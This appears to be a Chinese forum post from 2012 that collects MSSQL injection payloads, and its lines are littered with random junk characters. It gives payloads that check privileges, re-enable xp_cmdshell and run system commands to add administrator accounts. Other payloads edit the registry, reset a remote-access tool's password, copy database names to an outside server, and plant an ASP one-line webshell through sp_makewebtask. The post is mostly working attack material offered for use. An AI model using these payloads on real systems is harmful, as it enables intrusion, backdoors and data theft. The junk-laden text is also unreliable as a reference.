//看看是什么权限的. {4 ]) k* U) x" l2 I- k
and 1=(Select IS_MEMBER('db_owner'))
; B' q, A4 g7 a$ [: J4 @: `And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--8 I1 n) u0 b5 x3 i% `5 h' Z6 i
& O' ^& Y! s$ Y; |7 q- E: O( ~
//检测是否有读取某数据库的权限' e2 [5 b( C4 u, g+ G2 e
and 1= (Select HAS_DBACCESS('master'))
' k5 N% z* G6 K! oAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
/ Q: K ~1 X# ]; _
6 c" ^0 l. K7 L% b- @8 C2 L: `8 k
' l ]/ G' b% b1 F, k# e3 b8 u$ X4 k数字类型9 ~- m' e; [: S% S$ r( w% G0 S
and char(124)%2Buser%2Bchar(124)=0
2 ~, z7 O+ s. M; P
4 d4 m; R J8 i5 T8 S字符类型
9 L2 D! e4 k& Z+ _( t' and char(124)%2Buser%2Bchar(124)=0 and ''='
& @- j v, d t2 Q
" F: f D$ @# E/ X1 f; N搜索类型
" j1 Z) C$ [7 Z* ?; `' and char(124)%2Buser%2Bchar(124)=0 and '%'='
/ {4 H. v: M# u e) j6 K6 k! L, I. T- Q# T; E2 S0 w+ Z. k- R
爆用户名- S! Y; a; y* }$ ~% E
and user>04 f0 }( k1 `: |& @
' and user>0 and ''=' k3 N) z2 }+ J+ K2 o; J, ]: D" J
6 e! T" t* v' Y- A1 N
检测是否为SA权限
5 |) F X1 s- j1 X9 g+ C* ]and 1=(select IS_SRVROLEMEMBER('sysadmin'));--. T( w U" B5 \- |5 V
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --8 ], {8 s$ P: ~4 }% _! s, l
8 ?8 M" [: j+ _& l' ^7 U检测是不是MSSQL数据库0 n9 U# p9 i5 g/ Y5 F
and exists (select * from sysobjects);--& ?5 l% B; i% F. E$ ^
* T/ L6 v. K5 D& P6 m检测是否支持多行
2 ~# T8 d) [* J1 f' N( G;declare @d int;--: }, F$ N8 {; e r+ ^. ]% x* j5 {
& x) d1 n1 C; k# Q6 p
恢复 xp_cmdshell
% F5 ]# t7 i: @/ X% {' R4 o& A;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--, c+ Z, O, w6 [
% k, }6 Y2 O- m q$ ~1 u( f% T Q d
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')3 A% M; [ W8 o; @" x |* \/ P
% v. Q/ r0 N8 L
//-----------------------
; q$ ]! q8 ^9 T6 O7 B9 h& n// 执行命令5 N- U+ d F$ d- |% T. p7 @( d8 ]
//-----------------------1 g) ?! C+ [3 B
首先开启沙盘模式:
* p# B! |/ x7 }% x* hexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1' ]+ @4 E: I0 s; ~
$ v6 R6 F5 {6 P. z
然后利用jet.oledb执行系统命令
. B! X3 | b+ r( d8 B& Aselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
9 S5 Z, P5 E( f) {4 N" f$ ~9 s. N
4 ]+ u( ?* t6 j0 O; F3 x/ r执行命令5 V' I+ j, ^* |4 h
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
0 g! q3 {1 a1 k! L# J& a9 S
5 I2 e' ?% y. v. U! q+ fEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
" ], z2 T$ k+ h4 U5 Y$ K: T) Z& V" I; _- U6 W W
判断xp_cmdshell扩展存储过程是否存在:4 L3 H" p4 h- e/ P7 d4 O2 b$ h
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
* D( l/ }7 |! [
4 m. ?* s- B. M. z# t1 i写注册表
) e, q, E# k: _: L! y" `" Lexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
- x& ?5 i, Z$ _3 }. i1 z; e' K3 @' n" U4 p! _. O7 [8 Y, @
REG_SZ, p: p* ]' }% E
. m+ w4 o) X2 @- L2 j- `/ u读注册表
+ R/ m# t/ m; |$ b" uexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'! R$ A/ N0 l% ?' I
* ~# L# P& E9 M4 i
读取目录内容) I2 y& O- r$ r- T, k$ {- B' t; l' U
exec master..xp_dirtree 'c:\winnt\system32\',1,1$ m, y. O7 g W
2 S0 r9 u" ^) p5 X4 L A
/ \- E) D7 J; I0 s5 q p
数据库备份
1 [5 D" A6 W! R6 L7 Ybackup database pubs to disk = 'c:\123.bak'! Q, X4 ^3 p, G; ?7 l
, y5 C9 `9 M, J1 a9 Q% p. |//爆出长度0 v: d; g; _$ y$ \
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
4 b" |! t3 U" `+ p# ?* r, f$ u6 N3 ?7 i: m1 n% W2 ?
/ ^* B7 |4 V; U2 ~8 P
" x1 w- T! O! h! \更改sa口令方法:用sql综合利用工具连接后,执行命令: ?/ s1 w$ V) a& P- x- A6 i2 u
exec sp_password NULL,'新密码','sa'
% d; a2 W; Q4 [) S+ t: z' |6 s! o
添加和删除一个SA权限的用户test:1 m1 F; g4 Z5 A6 r
exec master.dbo.sp_addlogin test,9530772
2 I( g1 f- G% e- `+ w8 Lexec master.dbo.sp_addsrvrolemember test,sysadmin0 H$ Y j! q3 ?; p; v
5 b" n( N' ^+ u' ]& V9 i
删除扩展存储过过程xp_cmdshell的语句:% Q5 L! y7 v6 Y/ m" |0 s1 }
exec sp_dropextendedproc 'xp_cmdshell'4 Y' |! y+ Z. ?( |$ a
% R* k/ `( x* w0 \ u9 S
添加扩展存储过过程& d- _, X% E8 F6 @
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'! {- O% u) L& z2 A) i9 i8 Z7 z- F
GRANT exec On xp_proxiedadata TO public
7 a& K5 _. A! r* F" S+ r2 H" B0 C) \9 D% d& {* g6 |
. [, q) y' |# m2 q% S* m2 x, L停掉或激活某个服务。
% p. _8 b1 u4 m) o9 d2 u4 e) }" k! Y0 Z# q a- j7 c
exec master..xp_servicecontrol 'stop','schedule'
k/ D* J+ I/ j, i+ c- \exec master..xp_servicecontrol 'start','schedule'' Y2 x% s; N" K* N7 s
2 q! x" |1 S: v/ Wdbo.xp_subdirs5 o+ ~, h) F, f- R
7 ^) m3 Q9 C9 g7 V, D
只列某个目录下的子目录。, ]7 R2 y; m1 E9 Q
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'8 n0 B2 P: j' y* |% C: Q) |6 p8 M
% @6 O7 U# k. ]6 jdbo.xp_makecab, J% r2 l& B3 h9 m1 m
* J4 T ~0 S$ H) [4 r
将目标多个档案压缩到某个目标档案之内。
X: o! [6 a- X4 X5 b1 C. C7 P所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。8 \6 r6 \ N4 k, f- S9 g4 Z
3 Q4 |3 p" b/ S6 B0 o( x! m, h# Ndbo.xp_makecab
; P0 l" |0 V3 `3 b8 R: ^'c:\test.cab','mszip',1,
" I/ r- H" d. |% e" a! ]0 J'C:\Inetpub\wwwroot\SQLInject\login.asp',/ K& l. I. G; L9 f/ a
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
* A3 @2 K1 d* U" X v. l! y; ^. t; n7 @8 I" P4 R
xp_terminate_process# g/ F& x2 _) i5 x$ K) \0 M8 w
* W" \# A* R5 q8 f6 y停掉某个执行中的程序,但赋予的参数是 Process ID。( S" f& m3 b. N
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
; j s2 @: P9 W1 u4 D F& d6 s0 R
xp_terminate_process 2484
9 A3 D' m! ~4 k4 n* V9 H9 F( ` O4 ]/ L# s
xp_unpackcab+ s% U, J0 Y/ p& g
8 e; r6 i/ P& g* _% n& P" Y
解开压缩档。! l6 C- A8 H6 j. s/ J
% U& \4 c0 `* J
xp_unpackcab 'c:\test.cab','c:\temp',1/ B3 n& I' a& v
# G; ^. D5 j. _. F
2 v& _7 F$ ]1 K( n某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12340 {$ u5 @- l7 j% w
, M$ d4 Y9 ?5 I8 P3 k$ zcreate database lcx;( r8 _3 i) P- M/ f4 f
Create TABLE ku(name nvarchar(256) null);
9 R1 ~( r+ v2 h. TCreate TABLE biao(id int NULL,name nvarchar(256) null);
/ y0 O) H0 v7 @) q0 Y* p+ S. a) r, D- I/ j+ p6 `$ \
//得到数据库名7 U h% w- C# l
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases8 O7 |" c3 Q1 h% `* {. d
) a' k- r- R! ~$ t, F( V5 |
& g* f+ Z4 k6 ]
//在Master中创建表,看看权限怎样* f, K9 N! U. ^
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--; P# k* u ~+ u% T
( \! d/ H4 `6 j, o R$ m
用 sp_makewebtask直接在web目录里写入一句话马:
6 t. [% B# y4 B3 t# j/ T `http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
* O* {% M' i- }9 n9 W* }! A' P( N" T
, J r. ~+ ~4 @: z1 e b8 b/ i//更新表内容" V, I2 N ?! F% i( I+ \; X4 ]
Update films SET kind = 'Dramatic' Where id = 123
7 E7 ?! K9 l' y% z5 n! v5 \) I6 S* |; b( D9 j5 I! @
//删除内容
) G; s6 i( O2 U' ~, w; Tdelete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对